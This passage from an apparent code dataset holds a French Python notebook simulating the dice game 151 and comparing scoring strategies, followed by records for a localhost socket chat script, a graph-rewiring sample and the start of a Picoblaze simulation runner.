Simuler un tirage\n\n# Dépendances :\n\n# In[1]:\n\n\nimport numpy as np\nimport numpy.random as rn\nrn.seed(0) # Pour obtenir les mêmes résultats\nimport matplotlib.pyplot as plt\n\nimport seaborn as sns\nsns.set(context=\"notebook\", style=\"darkgrid\", palette=\"hls\", font=\"sans-serif\", font_scale=1.4)\n\n\n# Première fonction : pour tirer trois dés, à 6 faces, indépendants.\n\n# In[2]:\n\n\ndef tirage(nb=1):\n \"\"\" Renvoie un numpy array de taille (3,) si nb == 1, sinon (nb, 3).\"\"\"\n if nb == 1:\n return rn.randint(1, 7, 3)\n else:\n return rn.randint(1, 7, (nb, 3))\n\n\n# Testons là :\n\n# In[3]:\n\n\ntirage()\n\n\n# In[4]:\n\n\ntirage(10)\n\n\n# ### 1.2. Points d'un tirage\n# Le jeu de *151* associe les points suivants, multiples de 50, aux tirages de 3 dés :\n# \n# - 200 pour un brelan de 2, 300 pour un brelan de 3, .., 600 pour un brelan de 6, 700 pour un brelan de 1,\n# - 100 pour chaque 1, si ce n'est pas un brelan,\n# - 50 pour chaque 5, si ce n'est pas un brelan.\n\n# In[5]:\n\n\nCOMPTE_SUITE = False # Savoir si on implémente aussi la variante avec les suites\n\ndef _points(valeurs, compte_suite=COMPTE_SUITE):\n if valeurs[0] == valeurs[1] == valeurs[2]: # Un brelan !\n if valeurs[0] == 1:\n return 700\n else:\n return 100 * valeurs[0]\n else: # Pas de brelan\n # Code pour compter les suites :\n bonus_suite = compte_suite and set(np.diff(np.sort(valeurs))) == {1}\n return 100 * (np.sum(valeurs == 1) + bonus_suite) + 50 * np.sum(valeurs == 5)\n\n\ndef points(valeurs, compte_suite=COMPTE_SUITE):\n \"\"\" Calcule les points du tirage correspondant à valeurs.\n \n - si valeurs est de taille (3,), renvoie un seul entier,\n - si valeurs est de taille (nb, 3), renvoie un tableau de points.\n \"\"\"\n if len(np.shape(valeurs)) > 1:\n return np.array([_points(valeurs[i,:], compte_suite) for i in range(np.shape(valeurs)[0])])\n else:\n return _points(valeurs, compte_suite)\n\n\n# #### 1.2.1. Un seul tirage\n\n# Testons ces fonctions :\n\n# In[6]:\n\n\nvaleurs = tirage()\nprint(\"La valeur {} donne {:>5} points.\".format(valeurs, points(valeurs)))\n\n\n# In[7]:\n\n\nfor _ in range(20):\n valeurs = tirage()\n print(\"- La valeur {} donne {:>5} points.\".format(valeurs, points(valeurs)))\n\n\n# Testons quelques valeurs particulières :\n\n# - Les brelans :\n\n# In[8]:\n\n\nfor valeur in range(1, 7):\n valeurs = valeur * np.ones(3, dtype=int)\n print(\"- La valeur {} donne {:>5} points.\".format(valeurs, points(valeurs)))\n\n\n# - Les 1 :\n\n# In[9]:\n\n\nfor valeurs in [np.array([2, 3, 6]), np.array([1, 3, 6]), np.array([1, 1, 6])]:\n print(\"- La valeur {} donne {:>5} points.\".format(valeurs, points(valeurs)))\n\n\n# - Les 5 :\n\n# In[10]:\n\n\nfor valeurs in [np.array([2, 3, 6]), np.array([5, 3, 6]), np.array([5, 5, 6])]:\n print(\"- La valeur {} donne {:>5} points.\".format(valeurs, points(valeurs)))\n\n\n# → C'est bon, *tout* marche !\n# \n# *Note* : certaines variants du 151 accordent une valeur supplémentaire aux *suites* (non ordonnées) : [1, 2, 3] vaut 200, [2, 3, 4] vaut 100, et [3, 4, 5] et [4, 5, 6] vaut 150.\n# Ce n'est pas difficile à intégrer dans notre fonction `points`.\n\n# - Testons quand même les suites :\n\n# In[11]:\n\n\nfor valeurs in [np.array([1, 2, 3]), np.array([2, 3, 4]), np.array([3, 4, 5]), np.array([4, 5, 6])]:\n print(\"- La valeur {} donne {:>5} points.\".format(valeurs, points(valeurs)))\n\n\n# #### 1.2.2. 
Plusieurs tirages\n\n# Testons ces fonctions :\n\n# In[12]:\n\n\nvaleurs = tirage(10)\nprint(valeurs)\nprint(points(valeurs))\n\n\n# ----\n# \n# #### 1.2.3. Moyenne d'un tirage, et quelques figures\n\n# On peut faire quelques tests statistiques dès maintenant :\n\n# - Points moyens d'un tirage :\n\n# In[13]:\n\n\ndef moyenneTirage(nb=1000):\n return np.mean(points(tirage(nb), False))\n\ndef moyenneTirage_avecSuite(nb=1000):\n return np.mean(points(tirage(nb), True))\n\nfor p in range(2, 7):\n nb = 10 ** p\n print(\"- Pour {:>7} tirages, les tirages valent en moyenne {:>4} points.\".format(nb, moyenneTirage(nb)))\n print(\"- Pour {:>7} tirages, les tirages valent en moyenne {:>4} points si on compte aussi les suites.\".format(nb, moyenneTirage_avecSuite(nb)))\n\n\n# Ça semble converger vers 85 : en moyenne, un tirage vaut entre 50 et 100 points, plutôt du côté des 100.\n# Et si on compte les suites, la valeur moyenne d'un tirage vaut plutôt 96 points (ça augmente comme prévu, mais ça augmente peu).\n\n# - Moyenne et écart type :\n\n# In[14]:\n\n\ndef moyenneStdTirage(nb=1000):\n pts = points(tirage(nb))\n return np.mean(pts), np.std(pts)\n\nfor p in range(2, 7):\n nb = 10 ** p\n m, s = moyenneStdTirage(nb)\n print(\"- Pour {:>7} tirages, les tirages valent en moyenne {:6.2f} +- {:>6.2f} points.\".format(nb, m, s))\n\n\n# - Quelques courbes :\n\n# In[15]:\n\n\ndef plotPoints(nb=2000):\n pts = np.sort(points(tirage(nb)))\n m = np.mean(pts)\n plt.figure()\n plt.plot(pts, 'ro')\n plt.title(\"Valeurs de {} tirages. Moyenne = {:.2f}\".format(nb, m))\n plt.show()\n\n\n# In[16]:\n\n\nplotPoints()\n\n\n# In[17]:\n\n\nplotPoints(10**5)\n\n\n# In[18]:\n\n\nplotPoints(10**6)\n\n\n# - On peut calculer la probabilité d'avoir un tirage valant 0 points :\n\n# In[19]:\n\n\ndef probaPoints(nb=1000, pt=0, compte_suite=COMPTE_SUITE):\n pts = points(tirage(nb), compte_suite)\n return np.sum(pts == pt) / float(nb)\n\n\n# In[20]:\n\n\nfor p in range(2, 7):\n nb = 10 ** p\n prob = probaPoints(nb, compte_suite=False)\n print(\"- Pour {:>7} tirages, il y a une probabilité {:7.2%} d'avoir 0 point.\".format(nb, prob))\n prob = probaPoints(nb, compte_suite=True)\n print(\"- Pour {:>7} tirages, il y a une probabilité {:7.2%} d'avoir 0 point si on compte les suites.\".format(nb, prob))\n\n\n# Donc un tirage apporte 85 points en moyenne, mais il y a environ 28% de chance qu'un tirage rate.\n# \n# Si on compte les suites, un tirage apporte 97 points en moyenne, mais il y a environ 25% de chance qu'un tirage rate.\n\n# - On peut faire le même genre de calcul pour les différentes valeurs de points possibles :\n\n# In[21]:\n\n\n# valeursPossibles = list(set(points(tirage(10000))))\nvaleursPossibles = [0, 50, 100, 150, 200, 250, 300, 400, 500, 600, 700]\n\n\n# In[22]:\n\n\nfor p in range(4, 7):\n nb = 10 ** p\n tirages = tirage(nb)\n pts = points(tirages, False)\n pts_s = points(tirages, True)\n print(\"\\n- Pour {:>7} tirages :\".format(nb))\n for pt in valeursPossibles:\n prob = np.sum(pts == pt) / float(nb)\n print(\" - Il y a une probabilité {:7.2%} d'avoir {:3} point{}.\".format(prob, pt, 's' if pt > 0 else ''))\n prob = np.sum(pts_s == pt) / float(nb)\n print(\" - Il y a une probabilité {:7.2%} d'avoir {:3} point{} si on compte les suites.\".format(prob, pt, 's' if pt > 0 else ''))\n\n\n# On devrait faire des histogrammes, mais j'ai la flemme...\n# \n# Ces quelques expériences montrent qu'on a :\n# - une chance d'environ 2.5% d'avoir plus de 300 points (par un brelan),\n# - une chance d'environ 9% d'avoir entre 200 et 
300 points,\n# - une chance d'environ 11% d'avoir 150 points,\n# - une chance d'environ 27% d'avoir 100 points,\n# - une chance d'environ 22% d'avoir 50 points,\n# - une chance d'environ 28% d'avoir 0 point.\n# \n# Autant de chance d'avoir 100 points que 0 ? Et oui !\n# \n# La variante comptant les suites augmente la chance d'avoir 200 points (de 7.5% à 10%), d'avoir 150 points (de 11% à 16%), et diminue la chance d'avoir 0 point, mais ne change pas vraiment le reste du jeu.\n\n# ----\n# \n# ### 1.3. Simuler des parties\n# #### 1.3.1. Simuler une partie\n# On va d'abord écrire une fonction qui prend deux joeurs, un total, et simule la partie, puis donne l'indice (0 ou 1) du joueur qui gagne.\n\n# In[13]:\n\n\nDEBUG = False # Par défaut, on n'affiche rien\n\n\n# In[14]:\n\n\ndef unJeu(joueur, compte, total, debug=DEBUG):\n accu = 0\n if debug: print(\" - Le joueur {.__name__} commence à jouer, son compte est {} et le total est {} ...\".format(joueur, compte, total))\n t = tirage()\n nbLance = 1\n if points(t) == 0:\n if debug: print(\" - Hoho, ce tirage {} vallait 0 points, le joueur doit arrêter.\".format(t))\n return 0, nbLance\n if debug: print(\" - Le joueur a obtenu {} ...\".format(t))\n while compte + accu <= total and joueur(compte, accu, t, total):\n accu += points(t)\n t = tirage()\n nbLance += 1\n if debug: print(\" - Le joueur a décidé de rejouer, accumulant {} points, et a ré-obtenu {} ...\".format(accu, t))\n if points(t) == 0:\n if debug: print(\" - Hoho, ce tirage {} vallait 0 points, le joueur doit arrêter.\".format(t))\n break\n accu += points(t)\n if compte + accu > total:\n if debug: print(\" - Le joueur a dépassé le total : impossible de marquer ! compte = {} + accu = {} > total = {} !\".format(compte, accu, total))\n return 0, nbLance\n else:\n if accu > 0:\n if debug: print(\" - Le joueur peut marquer les {} points accumulés en {} lancés !\".format(accu, nbLance))\n return accu, nbLance\n\n\ndef unePartie(joueurs, total=1000, debug=DEBUG, i0=0):\n assert len(joueurs) == 2, \"Erreur, seulement 2 joueurs sont acceptés !\"\n comptes = [0, 0]\n nbCoups = [0, 0]\n nbLances = [0, 0]\n scores = [[0], [0]]\n if debug: print(\"- Le joueur #{} va commencer ...\".format(i0))\n i = i0\n while max(comptes) != total: # Tant qu'aucun joueur n'a gagné\n nbCoups[i] += 1\n if debug: print(\"- C'est au joueur #{} ({.__name__}) de jouer, son compte est {} et le total est {} ...\".format(i, joueurs[i], comptes[i], total))\n accu, nbLance = unJeu(joueurs[i], comptes[i], total, debug)\n nbLances[i] += nbLance\n if accu > 0:\n comptes[i] += accu\n scores[i].append(comptes[i]) # Historique\n if comptes[i] == total:\n if debug: print(\"- Le joueur #{} ({.__name__}) a gagné en {} coups et {} lancés de dés !\".format(i, joueurs[i], nbCoups[i], nbLances[i]))\n if debug: print(\"- Le joueur #{} ({.__name__}) a perdu, avec un score de {}, après {} coups et {} lancés de dés !\".format(i^1, joueurs[i^1], comptes[i^1], nbCoups[i^1], nbLances[i^1]))\n return i, scores\n i ^= 1 # 0 → 1, 1 → 0 (ou exclusif)\n\n# Note : on pourrait implémenter une partie à plus de 2 joueurs\n\n\n# ----\n# #### 1.3.2. 
Des stratégies\n# \n# On doit définir des stratégies, sous la forme de fonctions `joueur(compte, accu, t, total)`, qui renvoie `True` si elle doit continuer à jouer, ou `False` si elle doit marquer.\n# \n# D'abord, deux stratégies un peu stupides :\n\n# In[15]:\n\n\ndef unCoup(compte, accu, t, total):\n \"\"\" Stratégie qui marque toujours au premier coup, peu importe le 1er tirage obtenu.\"\"\"\n return False # Marque toujours !\n\ndef jusquauBout(compte, accu, t, total):\n \"\"\" Stratégie qui ne marque que si elle peut gagner exactement .\"\"\"\n if compte + accu + points(t) >= total:\n return False # Marque si elle peut gagner\n else:\n return True # Continue à jouer\n\n\n# Une autre stratégie, qui marche seulement si elle peut marquer plus de X points (100, 150 etc).\n# C'est la version plus \"gourmande\" de `unCoup`, qui marque si elle a plus de 50 points.\n\n# In[16]:\n\n\ndef auMoinsX(X):\n def joueur(compte, accu, t, total):\n \"\"\" Stratégie qui marque si elle a eu plus de {} points.\"\"\".format(X)\n if accu + points(t) >= X:\n return False # Marque si elle a obtenu plus de X points\n elif compte + accu + points(t) == total:\n return False # Marque si elle peut gagner\n elif total - compte < X:\n # S'il reste peu de points, marque toujours\n # (sinon la stratégie d'accumuler plus de X points ne marche plus)\n return False\n else:\n return True # Continue de jouer, essaie d'obtenir X points\n joueur.__name__ = \"auMoins{}\".format(X) # Triche sur le nom\n return joueur\n\nauMoins50 = auMoinsX(50) # == unCoup, en fait\nauMoins100 = auMoinsX(100)\nauMoins150 = auMoinsX(150)\nauMoins200 = auMoinsX(200) # Commence à devenir très audacieux\nauMoins250 = auMoinsX(250)\nauMoins300 = auMoinsX(300) # Compètement fou, très peu de chance de marquer ça ou plus!\nauMoins350 = auMoinsX(350)\nauMoins400 = auMoinsX(400)\nauMoins450 = auMoinsX(450)\nauMoins500 = auMoinsX(500)\nauMoins550 = auMoinsX(550)\nauMoins600 = auMoinsX(600)\nauMoins650 = auMoinsX(650)\nauMoins700 = auMoinsX(700)\n# On pourrait continuer ...\nauMoins800 = auMoinsX(800)\nauMoins850 = auMoinsX(850)\nauMoins900 = auMoinsX(900)\nauMoins950 = auMoinsX(950)\nauMoins1000 = auMoinsX(1000)\n\n\n# Une autre stratégie \"stupide\" : décider aléatoirement, selon une loi de Bernoulli, si elle continue ou si elle s'arrête.\n\n# In[17]:\n\n\ndef bernoulli(p=0.5):\n def joueur(compte, accu, t, total):\n \"\"\" Marque les points accumulés avec probabilité p = {} (Bernoulli).\"\"\".format(p)\n return rn.random() > p\n joueur.__name__ = \"bernoulli_{:.3g}\".format(p)\n return joueur\n\n\n# ----\n# #### 1.3.3. Quelques exemples\n# Essayons de faire jouer deux stratégies face à l'autre.\n\n# In[18]:\n\n\njoueurs = [unCoup, unCoup]\ntotal = 200\n\nunePartie(joueurs, total, True)\nunePartie(joueurs, total)\n\n\n# In[29]:\n\n\njoueurs = [unCoup, jusquauBout]\ntotal = 200\nunePartie(joueurs, total)\n\n\n# In[30]:\n\n\njoueurs = [unCoup, auMoins100]\ntotal = 500\nunePartie(joueurs, total)\n\n\n# In[31]:\n\n\njoueurs = [unCoup, auMoins200]\ntotal = 1000\nunePartie(joueurs, total)\n\n\n# ----\n# \n# #### 1.3.4. 
Générer plusieurs parties\n# On peut maintenant lancer plusieurs centaines de simulations de parties, sans afficher le déroulement de chaque parties.\n# La fonction `unePartie` renvoie un tuple, `(i, comptes)`, où :\n# - `i` est l'indice (0 ou 1) du joueur ayant gagné la partie,\n# - et `comptes` est une liste contenant les deux historiques des points des deux joueurs.\n\n# Par exemple, pour un `total = 500`, la sortie `(1, [[0, 100, 150, 250, 450], [0, 50, 450, 500]])` signifie :\n# - le joueur 1 a gagné, après avoir marqué 50 points, puis 400, et enfin 50,\n# - le joueur 2 a perdu, après avoir marqué 100 points, puis 50, puis 100, puis 200, mais a perdu avec 450 points.\n\n# In[57]:\n\n\ndef desParties(nb, joueurs, total=1000, i0=0):\n indices, historiques = [], []\n for _ in range(nb):\n i, h = unePartie(joueurs, total=total, i0=i0, debug=False)\n indices.append(i)\n historiques.append(h)\n return indices, historiques\n\n\n# Par exemple, on peut opposer le joueur pas courageux (`unCoup`) au joueur très gourmand (`jusquauBout`) sur 100 parties avec un total de 250 points :\n\n# In[33]:\n\n\ndef freqGain(indiceMoyen, i):\n # (1^i) + ((-1)**(i==0)) * indiceMoyen\n if i == 0:\n return 1 - indiceMoyen\n else:\n return indiceMoyen\n\n\n# In[56]:\n\n\ndef afficheResultatsDesParties(nb, joueurs, total, indices, historiques):\n indiceMoyen = np.mean(indices)\n pointsFinaux = [np.mean(list(historiques[k][i][-1] for k in range(nb))) for i in [0, 1]]\n\n print(\"Dans {} parties simulées, contre le total {} :\".format(nb, total))\n for i in [0, 1]:\n print(\" - le joueur {} ({.__name__:<11}) a gagné {:>5.2%} du temps, et a eu un score final moyen de {:>5g} points ...\".format(i, joueurs[i], freqGain(indiceMoyen, i), pointsFinaux[i]))\n\n\n# In[35]:\n\n\nnb = 10000\njoueurs = [unCoup, jusquauBout]\ntotal = 1000\nindices, historiques = desParties(nb, joueurs, total)\nafficheResultatsDesParties(nb, joueurs, total, indices, historiques)\n\n\n# In[36]:\n\n\nnb = 10000\njoueurs = [unCoup, jusquauBout]\ntotal = 500\nindices, historiques = desParties(nb, joueurs, total)\nafficheResultatsDesParties(nb, joueurs, total, indices, historiques)\n\n\n# In[37]:\n\n\nnb = 10000\njoueurs = [unCoup, jusquauBout]\ntotal = 5000\nindices, historiques = desParties(nb, joueurs, total)\nafficheResultatsDesParties(nb, joueurs, total, indices, historiques)\n\n\n# ----\n# Affichons une première courbe qui montrera la supériorité d'une stratégie face à la plus peureuse, en fonction du total.\n\n# In[99]:\n\n\ndef plotResultatsDesParties(nb, joueurs, totaux):\n N = len(totaux)\n indicesMoyens = []\n for total in totaux:\n indices, _ = desParties(nb, joueurs, total)\n indicesMoyens.append(np.mean(indices))\n plt.figure()\n plt.plot(totaux, indicesMoyens, 'ro')\n plt.xlabel(\"Objectif (points totaux à atteindre)\")\n plt.ylabel(\"Taux de victoire de 1 face à 0\")\n plt.title(\"Taux de victoire du joueur 1 ({.__name__}) face au joueur 0 ({.__name__}),\\n pour {} parties simulees pour chaque total.\".format(joueurs[1], joueurs[0], nb))\n plt.show()\n\n\n# In[100]:\n\n\nnb = 1000\njoueurs = [unCoup, jusquauBout]\ntotaux = [50, 100, 150, 200, 250, 300, 350, 400, 450, 500]\nplotResultatsDesParties(nb, joueurs, totaux)\n\n\n# In[101]:\n\n\nnb = 1000\njoueurs = [unCoup, jusquauBout]\ntotalMax = 2000\ntotaux = list(range(50, totalMax + 50, 50))\nplotResultatsDesParties(nb, joueurs, totaux)\n\n\n# ----\n# D'autres comparaisons, entre stratégies gourmandes.\n\n# In[102]:\n\n\nnb = 5000\njoueurs = [auMoins100, auMoins200]\ntotalMax = 
1000\ntotaux = list(range(50, totalMax + 50, 50))\nplotResultatsDesParties(nb, joueurs, totaux)\n\n\n# In[103]:\n\n\nnb = 1000\njoueurs = [auMoins100, jusquauBout]\ntotalMax = 2000\ntotaux = list(range(50, totalMax + 50, 100))\nplotResultatsDesParties(nb, joueurs, totaux)\n\n\n# In[104]:\n\n\nnb = 1000\ntotalMax = 2000\ntotaux = list(range(50, totalMax + 50, 50))\n\njoueurs = [unCoup, bernoulli(0.5)]\nplotResultatsDesParties(nb, joueurs, totaux)\n\n\n# In[105]:\n\n\njoueurs = [unCoup, bernoulli(0.1)]\nplotResultatsDesParties(nb, joueurs, totaux)\n\n\n# In[106]:\n\n\njoueurs = [unCoup, bernoulli(0.25)]\nplotResultatsDesParties(nb, joueurs, totaux)\n\n\n# In[107]:\n\n\njoueurs = [unCoup, bernoulli(0.75)]\nplotResultatsDesParties(nb, joueurs, totaux)\n\n\n# In[108]:\n\n\njoueurs = [unCoup, bernoulli(0.9)]\nplotResultatsDesParties(nb, joueurs, totaux)\n\n\n# ----\n# ## Évaluation en *self-play*\n# Plutôt que de faire jouer une stratégie face à une autre, et d'utiliser le *taux de victoire* comme une mesure de performance (ce que j'ai fait plus haut), on peut chercher à mesure un autre taux de victoire.\n# \n# On peut laisser une stratégie jouer tout seule, et mesurer plutôt le *nombre de coup requis pour gagner*.\n\n# In[19]:\n\n\ndef unePartieSeul(joueur, total=1000, debug=DEBUG):\n compte = 0\n nbCoups = 0\n nbLances = 0\n score = [0]\n if debug: print(\"Simulation pour le joueur ({.__name__}), le total à atteindre est {} :\".format(joueur, total))\n while compte < total: # Tant que joueur n'a pas gagné\n nbCoups += 1\n if debug: print(\" - Coup #{}, son compte est {} / {} ...\".format(nbCoups, compte, total))\n accu, nbLance = unJeu(joueur, compte, total, debug)\n nbLances += nbLance\n if accu > 0:\n compte += accu\n score.append(compte) # Historique\n if compte == total:\n if debug: print(\"- Le joueur ({.__name__}) a gagné en {} coups et {} lancés de dés !\".format(joueur, nbCoups, nbLances))\n return score\n\n\n# Testons ça avec la stratégie naïve `unCoup` :\n\n# In[55]:\n\n\nh = unePartieSeul(unCoup, 1000)\nprint(\"Partie gagnée en {} coups par le joueur ({.__name__}), avec le score {} ...\".format(len(h), unCoup, h))\n\n\n# ----\n# Comme précédemment, on peut générer plusieurs simulations pour la même tâche, et obtenir ainsi une liste d'historiques de jeu.\n\n# In[29]:\n\n\ndef desPartiesSeul(nb, joueur, total=1000, debug=False):\n historique = []\n for _ in range(nb):\n h = unePartieSeul(joueur, total=total, debug=debug)\n historique.append(h)\n return historique\n\n\n# In[60]:\n\n\ndesPartiesSeul(4, unCoup)\n\n\n# Ce qui nous intéresse est uniquement le nombre de coups qu'une certaine stratégie va devoir jouer avant de gagner :\n\n# In[116]:\n\n\n[len(l)-1 for l in desPartiesSeul(4, unCoup)]\n\n\n# Avec un joli affichage et un calcul du nombre moyen de coups :\n\n# In[117]:\n\n\ndef afficheResultatsDesPartiesSeul(nb, joueur, total, historique):\n nbCoupMoyens = np.mean([len(h) - 1 for h in historique])\n print(\"Dans {} parties simulées, contre le total {}, le joueur ({.__name__}) a gagné en moyenne en {} coups ...\".format(nb, total, joueur, nbCoupMoyens))\n\n\n# In[119]:\n\n\nhistorique = desPartiesSeul(100, unCoup, 1000)\nafficheResultatsDesPartiesSeul(100, unCoup, 1000, historique)\n\n\n# Comme précédemment, on peut afficher un graphique montrant l'évolution de ce nombre moyen de coups, disons pour $1000$ parties simulées, en fonction du total à atteindre.\n# La courbe obtenue devrait être croissante, mais difficile de prévoir davantage son comportement.\n\n# In[120]:\n\n\ndef 
plotResultatsDesPartiesSeul(nb, joueur, totaux):\n N = len(totaux)\n nbCoupMoyens = []\n for total in totaux:\n historique = desPartiesSeul(nb, joueur, total)\n nbCoupMoyens.append(np.mean([len(h) - 1 for h in historique]))\n plt.figure()\n plt.plot(totaux, nbCoupMoyens, 'ro')\n plt.xlabel(\"Objectif (points totaux à atteindre)\")\n plt.ylabel(\"Nombre moyen de coups joués avant de gagner\")\n plt.title(\"Nombre moyen de coups requis par {.__name__}\\n pour {} parties simulées pour chaque total.\".format(joueur, nb))\n plt.show()\n\n\n# ----\n# On va utiliser les mêmes paramètres de simulation que précédemment : $1000$ simulations pour chaque total, et des totaux allant de $50$ à $2000$ par pas de $50$.\n\n# In[121]:\n\n\nnb = 1000\ntotalMax = 2000\ntotaux = list(range(50, totalMax + 50, 50))\n\n\n# La courbe pour `unCoup` permet d'établir le comportement de la stratégie naïve, on pourra ensuite comparer les autres stratégies.\n\n# In[122]:\n\n\nplotResultatsDesPartiesSeul(nb, unCoup, totaux)\n\n\n# > Tient, pour `unCoup`, la courbe est linéaire dans le total. C'est assez logique, vue la stratégie utilisée !\n# > On marque à chaque coup, donc le nombre de coups moyens est juste le total divisé par le score moyen.\n# > On se rappelle que le score moyen en un tirage est d'environ $96$ points (avec suite), et en effet $2000 / 91 \\simeq 21$, ce qu'on lit sur la courbe.\n\n# In[123]:\n\n\nscoreMoyen = 96\ntotal = 2000\ntotal / scoreMoyen\n\n\n# ----\n# Pour `jusquauBout` :\n\n# In[124]:\n\n\nplotResultatsDesPartiesSeul(nb, jusquauBout, totaux)\n\n\n# > On constate que cette stratégie `jusquauBout` gagne bien plus rapidement que la stratégie `unCoup` !\n\n# ----\n# Pour `auMoins200`, par exemple :\n\n# In[125]:\n\n\nplotResultatsDesPartiesSeul(nb, auMoins200, totaux)\n\n\n# ----\n# Pour `bernoulli(0.5)`, par exemple :\n\n# In[126]:\n\n\nplotResultatsDesPartiesSeul(nb, bernoulli(0.5), totaux)\n\n\n# ----\n# Pour `bernoulli(0.2)`, par exemple :\n\n# In[127]:\n\n\nplotResultatsDesPartiesSeul(nb, bernoulli(0.2), totaux)\n\n\n# ----\n# Pour `bernoulli(0.8)`, par exemple :\n\n# In[128]:\n\n\nplotResultatsDesPartiesSeul(nb, bernoulli(0.8), totaux)\n\n\n# ----\n# Ces comparaisons de différentes stratégies de Bernoulli permettent de conclure, comme on le présentait, que la meilleure stratégie (parmi les quelques testées) est la stratégie `jusquauBout` !\n# \n# Toutes les courbes ci dessus montrent un comportement (presque) linéaire du nombre moyen de coups requis pour gagner en fonction du total.\n# \n# Ainsi, pour comparer différentes stratégies, on peut juste comparer leur nombre de coups moyen pour un certain total, disons $T = 2000$.\n\n# In[138]:\n\n\ndef comparerStrategies(joueurs, nb=1000, total=2000):\n resultats = []\n for joueur in joueurs:\n historique = desPartiesSeul(nb, joueur, total)\n nbCoupMoyen = np.mean([len(h) - 1 for h in historique])\n resultats.append((nbCoupMoyen, joueur.__name__))\n # Trier les résultats permet de voir les meilleures stratégies en premier !\n return sorted(resultats)\n\n\n# In[142]:\n\n\njoueurs = [unCoup, jusquauBout]\ncomparerStrategies(joueurs, nb=nb, total=totalMax)\n\n\n# On va comparer toutes les stratégies définies plus haut :\n\n# In[146]:\n\n\njoueurs = [unCoup, jusquauBout]\njoueurs += [auMoins50, auMoins100, auMoins150, auMoins200, auMoins250, auMoins300, auMoins350, auMoins400, auMoins450, auMoins500, auMoins550, auMoins600, auMoins650, auMoins700, auMoins800, auMoins850, auMoins900, auMoins950, auMoins1000]\nfor p in range(0, 20 + 1):\n 
for p in range(0, 20 + 1):\n joueurs.append(bernoulli(p/20.))\n\n# print([j.__name__ for j in joueurs])\n\n\n# In[148]:\n\n\nnb = 1000\ntotalMax = 2000\nresultats = comparerStrategies(joueurs, nb=nb, total=totalMax)\nprint(\"Pour le total {} et {} simulations ...\".format(totalMax, nb))\nfor (i, (n, j)) in enumerate(resultats):\n print(\"- La stratégie classée #{:2} / {} est {:<14}, avec un nombre moyen de coups = {:.3g} ...\".format(i + 1, len(joueurs), j, n))\n\n\n# In[149]:\n\n\nnb = 2000\ntotalMax = 3000\nresultats = comparerStrategies(joueurs, nb=nb, total=totalMax)\nprint(\"Pour le total {} et {} simulations ...\".format(totalMax, nb))\nfor (i, (n, j)) in enumerate(resultats):\n print(\"- La stratégie classée #{:2} / {} est {:<14}, avec un nombre moyen de coups = {:.3g} ...\".format(i + 1, len(joueurs), j, n))\n\n\n# In[150]:\n\n\nnb = 1000\ntotalMax = 5000\nresultats = comparerStrategies(joueurs, nb=nb, total=totalMax)\nprint(\"Pour le total {} et {} simulations ...\".format(totalMax, nb))\nfor (i, (n, j)) in enumerate(resultats):\n print(\"- La stratégie classée #{:2} / {} est {:<14}, avec un nombre moyen de coups = {:.3g} ...\".format(i + 1, len(joueurs), j, n))\n\n\n# $\implies$ la stratégie la plus efficace est en effet `jusquauBout` !\n\n# > Notons néanmoins que je n'ai testé que des stratégies très simples...\n# > En particulier, celles considérées n'utilisent pas, dans leur prise de décision, le nombre de coups déjà joués, ni le numéro du tirage courant.\n","repo_name":"Naereen/notebooks","sub_path":"simus/Simulations_du_jeu_de_151.py","file_name":"Simulations_du_jeu_de_151.py","file_ext":"py","file_size_in_byte":26668,"program_lang":"python","lang":"fr","doc_type":"code","stars":118,"dataset":"github-code","pt":"53"}
{"seq_id":"71331623207","text":"import socket\n\nip = \"127.0.0.1\"\nport = 8888\ntcp_listen_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\ntcp_listen_socket.bind((ip, port))\ntcp_listen_socket.listen(5)\n\n# Accept one client connection up front; the original code referenced an\n# undefined tcp_client_socket and would crash on the first send().\ntcp_client_socket, client_address = tcp_listen_socket.accept()\n\ndef send_mess():\n while True:\n msg = input('message: ')\n tcp_client_socket.send(msg.encode())\n print(tcp_client_socket.recv(1025).decode())\n\n if msg is None or msg == '' or msg == 'bye':\n break\n msg = tcp_client_socket.recv(4096).decode()\n print(f'Server: {msg}')\n tcp_client_socket.send(\n bytes(\"successfully received your messages\\n Typing....\", 'utf-8'))\n\n\nsend = send_mess()\n","repo_name":"Yabindradev/network","sub_path":"src/def.py","file_name":"def.py","file_ext":"py","file_size_in_byte":685,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
{"seq_id":"11656637562","text":"from greedy_rewiring import undirectedgraph\nfrom greedy_rewiring import greedy_rewiring as greedy\n\n# This sample illustrates how to use the greedy rewiring code. \n\nif __name__ == \"__main__\":\n adjacency_list = undirectedgraph.read_edge_list(\n 'random_regular_graph_mean8_N1000.txt')\n\n graph = undirectedgraph.UndirectedGraph(adjacency_list)\n rewired_graph = greedy.anyNodeAnyNeighborProbabilisticRewiring(graph, '1')\n rewired_graph.writeGraph('output.txt')\n","repo_name":"khandelwal/greedy-rewiring-network-generator","sub_path":"sample.py","file_name":"sample.py","file_ext":"py","file_size_in_byte":475,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
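A note on the next record (run_sim.py): the script reads a JSON flow description with the keys "flow_steps", "flow", "executable", "arguments" and an optional "gui" suffix. A minimal configuration consistent with those keys might look like the sketch below; the tool names and arguments are hypothetical, not taken from the repository.
{
  "flow_steps": {"10_compile": "compile", "20_simulate": "simulate"},
  "flow": {
    "compile": {"executable": "iverilog", "arguments": "-o sim.vvp top.v"},
    "simulate": {"executable": "vvp", "arguments": "sim.vvp", "gui": " --gui"}
  }
}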
{"seq_id":"27524893764","text":"#! /usr/bin/env python3\n\n\"\"\"\nrun_sim.py\n\nThis program is designed to run a Verilog simulation of the Picoblaze\nCPU on a Basys3 board.\n\"\"\"\n\nimport json\nimport os\nimport os.path\nimport shlex\nimport subprocess\nimport sys\nimport argparse\n\n\ndef which(program):\n \"\"\"\n Find the absolute path to specified program\n \"\"\"\n def is_exe(fpath):\n return os.path.isfile(fpath) and os.access(fpath, os.X_OK)\n\n fpath, _ = os.path.split(program)\n if fpath:\n if is_exe(program):\n return program\n else:\n for path in os.environ[\"PATH\"].split(os.pathsep):\n path = path.strip('\"')\n exe_file = os.path.join(path, program)\n if is_exe(exe_file):\n return exe_file\n\n return None\n\nif __name__ == \"__main__\":\n parser = argparse.ArgumentParser(\n description='Picoblaze Simulation')\n parser.add_argument(\"-D\", \"--debug\",\n help=\"Debug this script\",\n action=\"store_true\")\n parser.add_argument(\"--gui\",\n help=\"Run with GUI\",\n action=\"store_true\")\n parser.add_argument(\"--json_file\",\n default=\"simulate.json\",\n help=\"JSON configuration file\",\n 